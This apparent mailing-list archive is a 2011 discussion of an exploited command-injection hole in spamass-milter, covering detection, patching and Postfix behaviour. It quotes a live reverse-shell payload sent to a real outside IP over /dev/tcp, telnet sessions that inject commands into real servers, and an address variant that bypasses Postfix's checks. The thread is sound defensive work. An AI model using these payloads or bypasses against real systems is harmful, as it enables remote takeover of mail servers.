Mailing List Archive

Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
heads up:

in case you are using spamassassin milter:

active exploits going on.

<http://seclists.org/fulldisclosure/2010/Mar/140>
<http://www.securityfocus.com/bid/38578>

Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


-------- Original Message --------
Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt

The rule is only looking for this:

content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";

Personally, I would probably block it. Although, if we're not seeing
this sort of thing pop up on customer's boxes, a manual block in
scanner2 is sufficient for now, right?

Either way, let me know and I'll block/unblock/leave alone.

--

John Meyer

Associate Security Engineer

SECNAP Network Security

Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:* Michael Scheidell
*Sent:* Thursday, February 10, 2011 12:25 PM
*To:* John Meyer
*Cc:* Jonathan Scheidell; Anthony Wetula
*Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt

is the snort rule specific enough that you can block the offending ip
for 5 mins?

(if it's a real smtp server, it will retry) and let legit email through.



On 2/10/11 12:12 PM, John Meyer wrote:

I don't like the looks of this. I blocked that IP with samtool.

Payload:

rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"

data

.

quit

--

John Meyer

Associate Security Engineer

SECNAP Network Security

Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:* SECNAP Network Security
*Sent:* Thursday, February 10, 2011 12:01 PM
*To:* security-alert@scanner2.secnap.com
*Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt

02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote
Arbitrary Command Injection Attempt
[Classification: Attempted User Privilege Gain] [Priority: 1]

--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300
SECNAP Network Security Corporation

·Certified SNORT Integrator

·2008-9 Hot Company Award Winner, World Executive Alliance

·Five-Star Partner Program 2009, VARBusiness

·Best in Email Security,2010: Network Products Guide

·King of Spam Filters, SC Magazine 2008


______________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r).
For Information please see http://www.secnap.com/products/spammertrap/
______________________________________________________________________
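The Snort signature John Meyer quotes in the message above (`content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";`) is two content matches. The following is an added example, not part of the thread and not the Emerging Threats rule itself: it reimplements only those two checks in Python so the `depth` and `nocase` semantics can be exercised over constructed SMTP command lines. The rule's flow, port and other options are not shown in the message and are left out; the sample lines are made up for the example, with the command after the pipe replaced by a harmless marker.

```python
# Reimplementation of the two content matches in the ET rule quoted above,
# applied to constructed SMTP command lines.  |3A| and |7C| are Snort's hex
# notation for ':' and '|'.

FIRST_CONTENT = b"to:"    # content:"to|3A|"; depth:10; nocase;
FIRST_DEPTH = 10          # the whole match must lie within the first 10 bytes
SECOND_CONTENT = b'+:"|'  # content:"+|3A|\"|7C|";  (no depth: anywhere, case-sensitive)


def rule_matches(payload: bytes) -> bool:
    """True when both content checks succeed on one payload, in rule order.

    depth:N bounds the search window for a content match to the first N bytes,
    so the first pattern is searched only in payload[:FIRST_DEPTH]; nocase is
    handled by lower-casing that window.  The second content has no modifiers,
    so it is an exact byte search over the whole payload."""
    if FIRST_CONTENT not in payload[:FIRST_DEPTH].lower():
        return False
    return SECOND_CONTENT in payload


def scan(lines):
    """Return [(line, matched)] for a batch of payloads, e.g. one captured
    session split into commands."""
    return [(line, rule_matches(line)) for line in lines]


# Constructed samples (not captured traffic).  The first two mimic the posted
# payload's shape with the command replaced by a harmless marker; the rest show
# what the rule deliberately does not fire on.
SAMPLES = [
    (b'rcpt to: root+:"|echo injected"\r\n', True),
    (b'RCPT TO:<root+:"|echo injected;@example.com">\r\n', True),   # domain-looking suffix does not evade it
    (b'RCPT TO:<user+newsletter@example.com>\r\n', False),          # ordinary plus-addressing
    (b'MAIL FROM:<sender@example.com>\r\n', False),                 # no "to:" at all
    (b'X-Original-Rcpt to: root+:"|echo injected"\r\n', False),    # "to:" starts at byte 16, past depth:10
]


if __name__ == "__main__":
    for line, expected in SAMPLES:
        got = rule_matches(line)
        flag = "ALERT" if got else "pass "
        print(f"{flag} {line!r}  (expected {expected})")
```

Because the signature keys on the `+:"|` byte sequence rather than on the domain part, an address that would satisfy an MTA's fully-qualified-address check still fires it; conversely, `depth:10` means a `to:` that appears later in the payload is never considered, so the check is per SMTP command, not per message body.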
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Thu, 10 Feb 2011 12:42:40 -0500
Michael Scheidell <michael.scheidell@secnap.com> wrote:

> heads up:

Aieee.... popen() in security-sensitive software!??!??

Also, why does the milter process run as root? That seems like a huge
hole all by itself.

Regards,

David.
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Copying the spamass-milter mailing list.

On 02/10/2011 09:42 AM, Michael Scheidell wrote:
>> in case you are using spamassassin milter:
>>
>> active exploits going on.
>>
>> <http://seclists.org/fulldisclosure/2010/Mar/140>
>> <http://www.securityfocus.com/bid/38578>
>>
>> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>>
>> I don't see anything on bugtraq about a fix.

On 02/10/2011 10:21 AM, David F. Skoll wrote:
> Aieee.... popen() in security-sensitive software!??!??
>
> Also, why does the milter process run as root? That seems like a huge
> hole all by itself.


Does this affect sendmail as well as postfix? I assume so, but wanted
an explicit confirmation. (I am no longer managing an environment that
uses this milter and therefore cannot verify myself.)
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Thursday February 10 2011 21:14:59 Adam Katz wrote:
> Does this affect sendmail as well as postfix? I assume so,
> but wanted an explicit confirmation.

Yes, the security hole is entirely within the milter,
independent of the MTA.

Mark
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On 02/11/2011 09:37 AM, Mark Martinec wrote:
> Yes, the security hole is entirely within the milter,
> independent of the MTA.
>
That exploit is dated Mar 2010? Has this really not been fixed in about
a year???

--
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Fri, 11 Feb 2011 09:50:05 +1300
Jason Haar <Jason.Haar@trimble.co.nz> wrote:

> That exploit is dated Mar 2010? Has this really not been fixed in
> about a year???

If everyone is talking about http://savannah.nongnu.org/projects/spamass-milt/,
it looks like the last release was in 2006. It looks like that project
is abandoned.

Regards,

David.
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Sorry to follow up on myself...

> If everyone is talking about
> http://savannah.nongnu.org/projects/spamass-milt/, it looks like the
> last release was in 2006. It looks like that project is abandoned.

I cannot edit the wiki, but I think spamass-milt should be removed from
http://wiki.apache.org/spamassassin/IntegratedInMta or at least marked
unsafe. There are several other milters available; people shouldn't
be using spamass-milt.

Regards,

David.
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
* Mark Martinec <Mark.Martinec+sa@ijs.si>:
> On Thursday February 10 2011 21:14:59 Adam Katz wrote:
> > Does this affect sendmail as well as postfix? I assume so,
> > but wanted an explicit confirmation.
>
> Yes, the security hole is entirely within the milter,
> independent of the MTA.

I tried the exploit and it seems that Postfix' restrictions that check for FQDN
address and correct recipient syntax prevent the exploit from getting through:

telnet mail.example.de 25
220 mail.example.de ESMTP Postfix
HELO foo
250 mail.example.de
MAIL FROM:<>
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:<root+:"|touch /tmp/foo">
504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need fully-qualified address
RCPT TO:<root@localhost+:"|touch /tmp/foo">
501 5.1.3 Bad recipient address syntax
QUIT
221 2.0.0 Bye

Can anyone confirm this?

p@rick


--
state of mind
Digitale Kommunikation

http://www.state-of-mind.de

Franziskanerstraße 15 Telefon +49 89 3090 4664
81669 München Telefax +49 89 3090 4666

Amtsgericht München Partnerschaftsregister PR 563
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Thu, 2011-02-10 at 16:04 -0500, David F. Skoll wrote:
> I cannot edit the wiki,

I'd be happy to change that. :)

Please just drop me your wiki user name. Same goes for everyone else who
wants to edit the wiki. We've been forced to put ACLs in place as a
counter measure to vandalism and abuse for spam.


> [...] but I think spamass-milt should be removed from
> http://wiki.apache.org/spamassassin/IntegratedInMta or at least marked
> unsafe. There are several other milters available; people shouldn't
> be using spamass-milt.

--
char *t="\10pse\0r\0dtu\0.@ghno\x4e\xc8\x79\xf4\xab\x51\x8a\x10\xf4\xf4\xc4";
main(){ char h,m=h=*t++,*x=t+2*h,c,i,l=*x,s=0; for (i=0;i<l;i++){ i%8? c<<=1:
(c=*++x); c&128 && (s+=h); if (!(h>>=1)||!t[s+h]){ putchar(t[s]);h=m;s=0; }}}
Re: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Hi,

Seems ok with postfix unless I missed something, which is possible.

$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:<root+:"|touch /tmp/foo">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
RCPT TO:<root@localhost+:"|touch /tmp/foo">
501 5.1.3 Bad recipient address syntax
rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
501 5.1.3 Bad recipient address syntax
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0">
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
.
qu250 2.0.0 Ok: queued as 24E96819DF
502 5.5.2 Error: command not recognized
it
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/62.58.61.184/45295 1>&0 2>&0">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.

On 02/10/2011 06:42 PM, Michael Scheidell wrote:
> heads up:
>
> in case you are using spamassassin milter:
>
> active exploits going on.
>
> <http://seclists.org/fulldisclosure/2010/Mar/140>
> <http://www.securityfocus.com/bid/38578>
>
> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>
> I don't see anything on bugtraq about a fix.
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Fri, 11 Feb 2011, Jason Haar wrote:

> On 02/11/2011 09:37 AM, Mark Martinec wrote:
> > Yes, the security hole is entirely within the milter,
> > independent of the MTA.
> >
> That exploit is dated Mar 2010? Has this really not been fixed in about
> a year???
>
>

"a year"??, try half-a-decade. I've got a copy of that code from March
2006 and the vulnerability is there. Rather stale project. ;)


--
Dave Funk University of Iowa
<dbfunk (at) engineering.uiowa.edu> College of Engineering
319/335-5751 FAX: 319/384-0549 1256 Seamans Center
Sys_admin/Postmaster/cell_admin Iowa City, IA 52242-1527
#include <std_disclaimer.h>
Better is not better, 'standard' is better. B{
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Thu, 10 Feb 2011, David B Funk wrote:

> On Fri, 11 Feb 2011, Jason Haar wrote:
>
>> On 02/11/2011 09:37 AM, Mark Martinec wrote:
>>> Yes, the security hole is entirely within the milter,
>>> independent of the MTA.
>>>
>> That exploit is dated Mar 2010? Has this really not been fixed in about
>> a year???
>>
>>
>
> "a year"??, try half-a-decade. I've got a copy of that code from March
> 2006 and the vulnerability is there. Rather stale project. ;)

heh.

I suppose we ought to compose a boilerplate response for the inevitable
visitors who will show up asking about this "exploit in SpamAssassin"...

--
John Hardin KA7OHZ http://www.impsec.org/~jhardin/
jhardin@impsec.org FALaholic #11174 pgpk -a jhardin@impsec.org
key: 0xB8732E79 -- 2D8C 34F4 6411 F507 136C AF76 D822 E6E6 B873 2E79
-----------------------------------------------------------------------
Any time law enforcement becomes a revenue center, the system
becomes corrupt.
-----------------------------------------------------------------------
2 days until Abraham Lincoln's and Charles Darwin's 202nd Birthdays
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Thursday February 10 2011 22:26:37 Patrick Ben Koetter wrote:
> I tried the exploit and it seems that Postfix' restrictions that check for
> FQDN address and correct recipient syntax prevent the exploit from getting
> through:

> RCPT TO:root+:"|touch /tmp/foo"
> 501 5.1.3 Bad recipient address syntax
> RCPT TO:<root+:"|touch /tmp/foo">
> 504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need
> fully-qualified address
> RCPT TO:<root@localhost+:"|touch /tmp/foo">
> 501 5.1.3 Bad recipient address syntax

> Can anyone confirm this?

rcpt to:<root+:"|touch /tmp/foo;@example.com">
250 2.1.5 Ok


Mark
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On 2/10/2011 1:29 PM, John Hardin wrote:
> On Thu, 10 Feb 2011, David B Funk wrote:
>
>> On Fri, 11 Feb 2011, Jason Haar wrote:
>>
>>> On 02/11/2011 09:37 AM, Mark Martinec wrote:
>>>> Yes, the security hole is entirely within the milter,
>>>> independent of the MTA.
>>>>
>>> That exploit is dated Mar 2010? Has this really not been fixed in about
>>> a year???
>>>
>>>
>>
>> "a year"??, try half-a-decade. I've got a copy of that code from March
>> 2006 and the vulnerability is there. Rather stale project. ;)
>
> heh.
>
> I suppose we ought to compose a boilerplate response for the inevitable
> visitors who will show up asking about this "exploit in SpamAssassin"...
>

Perhaps more than boilerplate, but rather an official advisory to clear
up the confusion? Given that upstream of that milter is dead, nobody
else will make an official advisory?

Warren
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On 10/02/2011 19:21, David F. Skoll wrote:
> On Thu, 10 Feb 2011 12:42:40 -0500
> Michael Scheidell<michael.scheidell@secnap.com> wrote:
>
>> heads up:
> Aieee.... popen() in security-sensitive software!??!??
>
> Also, why does the milter process run as root? That seems like a huge
> hole all by itself.
>
Under CentOS spamass-milter appears to run as sa-milt.

The vulnerability is only active if the milter is run with the '-x'
expand (for virtusertable / alias expansion) option.

While the project page is inactive, the distribution packages of
spamass-milter often contain unofficial patches which expand its
features, and it wouldn't surprise me if they also fix this vulnerability.

I believe Dan Nelson was the maintainer of the package, not sure if it
is the same Dan Nelson that is often present on the MySQL lists.

Anyone know whether the CentOS one is vulnerable?

Name : spamass-milter
Arch : i386
Version : 0.3.1
Release : 24.rhel5

--
Best Regards,

Giles Coochey
NetSecSpec Ltd
NL T-Systems Mobile: +31 681 265 086
NL Mobile: +31 626 508 131
GIB Mobile: +350 5401 6693
Email/MSN/Live Messenger: giles@coochey.net
Skype: gilescoochey
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On 10/02/2011 22:01, David F. Skoll wrote:
> On Fri, 11 Feb 2011 09:50:05 +1300
> Jason Haar<Jason.Haar@trimble.co.nz> wrote:
>
>> That exploit is dated Mar 2010? Has this really not been fixed in
>> about a year???
> If everyone is talking about http://savannah.nongnu.org/projects/spamass-milt/,
> it looks like the last release was in 2006. It looks like that project
> is abandoned.
>

Not quite abandoned:

*From*: Dan Nelson
*Subject*: Re: alert: New event: ET EXPLOIT Possible SpamAssassin
Milter Plugin Remote Arbitrary Command Injection Attempt
*Date*: Fri, 11 Feb 2011 00:08:26 -0600
*User-agent*: Mutt/1.5.21 (2010-09-15)

------------------------------------------------------------------------

In the last episode (Feb 10), Don Armstrong said:
> On Thu, 10 Feb 2011, Adam Katz wrote:
> > On 02/10/2011 10:21 AM, David F. Skoll wrote:
> > > Aieee.... popen() in security-sensitive software!??!??
> > >
> > > Also, why does the milter process run as root? That seems like a huge
> > > hole all by itself.
> >
> > Does this affect sendmail as well as postfix?
>
> It only affects you if you're running with -x. This was patched in
> Debian and Redhat in March of 2010.
>
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=573228

I thought I committed the patch to CVS, but apparently hadn't. It's
committed now, and I'll do a release this weekend.

--
Dan Nelson
address@hidden


--
Best Regards,

Giles Coochey
NetSecSpec Ltd
NL T-Systems Mobile: +31 681 265 086
NL Mobile: +31 626 508 131
GIB Mobile: +350 5401 6693
Email/MSN/Live Messenger: giles@coochey.net
Skype: gilescoochey
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Am 10.02.2011 22:26, schrieb Patrick Ben Koetter:
> * Mark Martinec <Mark.Martinec+sa@ijs.si>:
>> On Thursday February 10 2011 21:14:59 Adam Katz wrote:
>>> Does this affect sendmail as well as postfix? I assume so,
>>> but wanted an explicit confirmation.
>>
>> Yes, the security hole is entirely within the milter,
>> independent of the MTA.
>
> I tried the exploit and it seems that Postfix' restrictions that check for FQDN
> address and correct recipient syntax prevent the exploit from getting through:
>
> telnet mail.example.de 25
> 220 mail.example.de ESMTP Postfix
> HELO foo
> 250 mail.example.de
> MAIL FROM:<>
> 250 2.1.0 Ok
> RCPT TO:root+:"|touch /tmp/foo"
> 501 5.1.3 Bad recipient address syntax
> RCPT TO:<root+:"|touch /tmp/foo">
> 504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need fully-qualified address
> RCPT TO:<root@localhost+:"|touch /tmp/foo">
> 501 5.1.3 Bad recipient address syntax
> QUIT
> 221 2.0.0 Bye
>
> Can anyone confirm this?
>
> p@rick
>
>
Hi Patrick, the problem was fixed last year, as far as I know.

It never worked with default Postfix settings;
also the -x switch isn't widely used.

http://savannah.nongnu.org/bugs/?29136
--
Best Regards

MfG Robert Schetterer

Germany/Munich/Bavaria
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On 02/11/2011 03:39 AM, Giles Coochey wrote:
> Under CentOS spamass-milter appears to run as sa-milt.

IIRC, Debian does this too. However, the -x flag may require running as
root, so it is possible (I have not verified) that it never downgrades
its privileges.

> The Vulnerability is only active if the milter is run with the '-x'
> expand (for virtusertable / alias expansion) option.

Correct.

> While the project page is inactive, the distribution packages of
> spamass-milter often contain unofficial patches which expand its
> features, and wouldn't surprise me if they also fix this
> vulnerability.

They did. That fix was also supposed to go upstream but accidentally
did not.

> Anyone know whether the CentOS one is vulnerable?
>
> Name : spamass-milter
> Arch : i386
> Version : 0.3.1
> Release : 24.rhel5

You are all set.

RHEL release 0.3.1-17 introduced the fix. 0.3.1-19 includes a related
zombie process fix (CVE-2010-1132). See changelog in:
http://rpmfind.net//linux/RPM/fedora/devel/rawhide/i386/spamass-milter-0.3.1-24.fc15.i686.html#Changelog
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Am 11.02.2011 20:11, schrieb Adam Katz:
> On 02/11/2011 03:39 AM, Giles Coochey wrote:
>> Under CentOS spamass-milter appears to run as sa-milt.
>
> IIRC, Debian does this too. However, the -x flag may require running as
> root, so it is possible (I have not verified) that it never downgrades
> its privileges.
>
>> The Vulnerability is only active if the milter is run with the '-x'
>> expand (for virtusertable / alias expansion) option.
>
> Correct.
>
>> While the project page is inactive, the distribution packages of
>> spamass-milter often contain unofficial patches which expand its
>> features, and wouldn't surprise me if they also fix this
>> vulnerability.
>
> They did. That fix was also supposed to go upstream but accidentally
> did not.
>
>> Anyone know whether the CentOS one is vulnerable?
>>
>> Name : spamass-milter
>> Arch : i386
>> Version : 0.3.1
>> Release : 24.rhel5
>
> You are all set.
>
> RHEL release 0.3.1-17 introduced the fix. 0.3.1-19 includes a related
> zombie process fix (CVE-2010-1132). See changelog in:
> http://rpmfind.net//linux/RPM/fedora/devel/rawhide/i386/spamass-milter-0.3.1-24.fc15.i686.html#Changelog
>

Whatever the case, it has been fixed in Ubuntu Lucid since last year:

+spamass-milter (0.3.1-10) unstable; urgency=low
+
+ * Fix zombies which were happening with -x. (closes: #575019)
+
+ -- Don Armstrong <don@debian.org> Mon, 22 Mar 2010 14:39:12 -0700
+
+spamass-milter (0.3.1-9) unstable; urgency=high
+
+ * Call restorecon on the socket and pidfile directories to make SELinux
+ happy (thanks to Russell Coker) (closes: #518552)
+ * Document how to make inet:9999@127.0.0.1 work (closes: #519245)
+ * Document that using the -x option requires being in the smmsp group
+ (closes: #515158)
+ * Deal with inet:999 sockets (closes: #514749)
+ - handle them more sanely in the init script
+ - document how to deal with them in README.Debian and
+ /etc/spamass-milter/default
+ * Use new popenenv function instead of open; fixes remote code exploit
+ as the spamass-milter user when run using -x. (closes: #573228)
+
+ -- Don Armstrong <don@debian.org> Wed, 11 Mar 2009 03:59:39 -0700
+
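Review bot: the 0.3.1-9 entry at the bottom of the pasted changelog is dated "Wed, 11 Mar 2009", yet it sits directly below 0.3.1-10 (22 Mar 2010) and closes #573228, the bug that Don Armstrong's quoted message earlier in the thread places in March 2010; the year looks like a typo and should read 2010, otherwise the entry that carries the popenenv security fix ("urgency=high") reads as a year older than the bug it closes and the changelog no longer sorts by date.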


--
Best Regards

MfG Robert Schetterer

Germany/Munich/Bavaria
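The 0.3.1-9 changelog entry above attributes the fix to a popenenv function replacing the earlier popen-style call. The following is an added illustration, not spamass-milter's own code (which is C++) and not the Debian patch: it contrasts the two expansion styles in Python. It assumes the legacy code interpolated the recipient into a double-quoted shell string of the form `sendmail -bv "<rcpt>"`, which is what the quote placement in the posted payload relies on; the `sendmail` path, the `-bv` flag and the sample addresses are constructed for the example, and the argv variant is exercised with the Python interpreter standing in for the MTA binary so that it runs offline.

```python
import shlex
import subprocess
import sys

SENDMAIL = "sendmail"  # placeholder path; the stand-in below never execs it

# Constructed sample recipients (not captured traffic): the hostile one has the
# same shape as the thread's payloads but carries only a harmless marker.
HOSTILE_RCPT = 'alias+:"|echo INJECTED"'
BENIGN_RCPT = "alias+newsletter@example.com"

SHELL_OPERATORS = {"|", ";", "&", "&&", "||"}


def legacy_command_line(rcpt: str) -> str:
    """Assumed shape of the pre-fix expansion: the recipient is pasted into a
    shell command string and handed to popen().  The quotes around the address
    are what the posted payload's own quote placement relies on."""
    return f'{SENDMAIL} -bv "{rcpt}"'


def shell_tokens(cmdline: str) -> list:
    """Tokenize cmdline the way /bin/sh would (quote removal, operator
    splitting) without executing anything."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def shell_would_run_extra_command(cmdline: str) -> bool:
    """True when the shell would see a pipeline or command list, i.e. when the
    address broke out of the quotes the caller put around it."""
    return any(tok in SHELL_OPERATORS for tok in shell_tokens(cmdline))


def safe_argv(rcpt: str) -> list:
    """popenenv-style replacement: an argv vector is passed straight to exec,
    so no shell parses the address and it arrives as one literal argument."""
    return [SENDMAIL, "-bv", rcpt]


def run_safely(rcpt: str) -> str:
    """Exercise the argv path offline: the Python interpreter stands in for the
    MTA binary and reports the final argument it actually received."""
    argv = safe_argv(rcpt)
    stand_in = [sys.executable, "-c",
                "import sys; sys.stdout.write(sys.argv[-1])"] + argv[1:]
    done = subprocess.run(stand_in, capture_output=True, text=True, check=True)
    return done.stdout


if __name__ == "__main__":
    for rcpt in (BENIGN_RCPT, HOSTILE_RCPT):
        line = legacy_command_line(rcpt)
        print(f"legacy : {line!r} -> extra command? "
              f"{shell_would_run_extra_command(line)}")
        print(f"argv   : child saw {run_safely(rcpt)!r}")
```

The tokenizer shows the failure mode without running anything: for the hostile address the closing quote inside the local part ends the caller's quoting, `|` becomes a shell operator and `echo INJECTED` a second command. With the argv form there is no shell between the milter and the MTA binary, so the same string reaches the child unchanged as one argument, which is the property the popenenv fix restores.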
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On 02/10/2011 03:41 PM, Warren Togami Jr. wrote:
> On 2/10/2011 1:29 PM, John Hardin wrote:
>> I suppose we ought to compose a boilerplate response for the
>> inevitable visitors who will show up asking about this "exploit in
>> SpamAssassin"...
>
> Perhaps more than boilerplate, but rather an official advisory to
> clear up the confusion? Given that upstream of that milter is dead,
> nobody else will make an official advisory?

This came from an accidental lost checkin that has since been fixed.
There is little activity on the spamass-milter project because it
doesn't need anything; almost all updates go to SA and the MTAs rather
than the milter.

As noted by Robert Schetterer, postfix doesn't allow this syntax
anymore. As Giles Coochey forwarded from the sa-milter list, maintainer
Dan Nelson has committed the patch to CVS and will officially release
the fix this weekend. I'm one of several people who have mentioned that
this is fixed in both Fedora- and Debian- derived systems.

There appears to be a communication issue between these two lists; once
I connected the SA list to the SA-milter list, the issue got resolved in
very quick order. SA-milter is still one of the best methods for
invoking SA from sendmail or postfix.

I consider it a mission-critical component to be able to deliver a
rejection notice at SMTP-time (to avoid backscatter from an emailed
bounce message). The other systems out there (specifically amavis and
mailscanner) just can't do this while spamass-milter does it with very
little overhead or configuration.

I've considered working on boosting the support for SA in
milter-greylist (my C is 5-10+ years rusty and my free time is sparse),
but most people have a hard time understanding that you can use that
milter without greylisting -- it does all sorts of useful things at
SMTP-time (before and after DATA), including SPF, DKIM, DNSBLs,
tarpitting, spamassassin (limited), p0f, and greylisting.

Notes on SA support in Milter-Greylist:
http://tech.groups.yahoo.com/group/milter-greylist/message/5621
(Tip for evading Yahoo's cookies: set UserAgent to "Googlebot/2.1")
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Fri, 11 Feb 2011 12:08:35 -0800
Adam Katz <antispam@khopis.com> wrote:

> I consider it a mission-critical component to be able to deliver a
> rejection notice at SMTP-time (to avoid backscatter from an emailed
> bounce message). The other systems out there (specifically amavis and
> mailscanner) just can't do this while spamass-milter does it with very
> little overhead or configuration.

MIMEDefang can do it, plus all kinds of other things at SMTP time.
(Overhead may be slightly higher than spamass-milter, but probably
not much.)

Regards,

David.
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Am 11.02.2011 21:08, schrieb Adam Katz:
> On 02/10/2011 03:41 PM, Warren Togami Jr. wrote:
>> On 2/10/2011 1:29 PM, John Hardin wrote:
>>> I suppose we ought to compose a boilerplate response for the
>>> inevitable visitors who will show up asking about this "exploit in
>>> SpamAssassin"...
>>
>> Perhaps more than boilerplate, but rather an official advisory to
>> clear up the confusion? Given that upstream of that milter is dead,
>> nobody else will make an official advisory?
>
> This came from an accidental lost checkin that has since been fixed.
> There is little activity on the spamass-milter project because it
> doesn't need anything; almost all updates go to SA and the MTAs rather
> than the milter.
>
> As noted by Robert Schetterer, postfix doesn't allow this syntax
> anymore. As Giles Goochey forwarded from the sa-milter list, maintainer
> Dan Nelson has committed the patch to CVS and will officially release
> the fix this weekend. I'm one of several people who have mentioned that
> this is fixed in both Fedora- and Debian- derived systems.
>
> There appears to be a communication issue between these two lists; once
> I connected the SA list to the SA-milter list, the issue got resolved in
> very quick order. SA-milter is still one of the best methods for
> invoking SA from sendmail or postfix.
>
> I consider it a mission-critical component to be able to deliver a
> rejection notice at SMTP-time (to avoid backscatter from an emailed
> bounce message). The other systems out there (specifically amavis and
> mailscanner) just can't do this while spamass-milter does it with very
> little overhead or configuration.

shit happens, great you noticed it yet

>
> I've considered working on boosting the support for SA in
> milter-greylist (my C is 5-10+ years rusty and my free time is sparse),
> but most people have a hard time understanding that you can use that
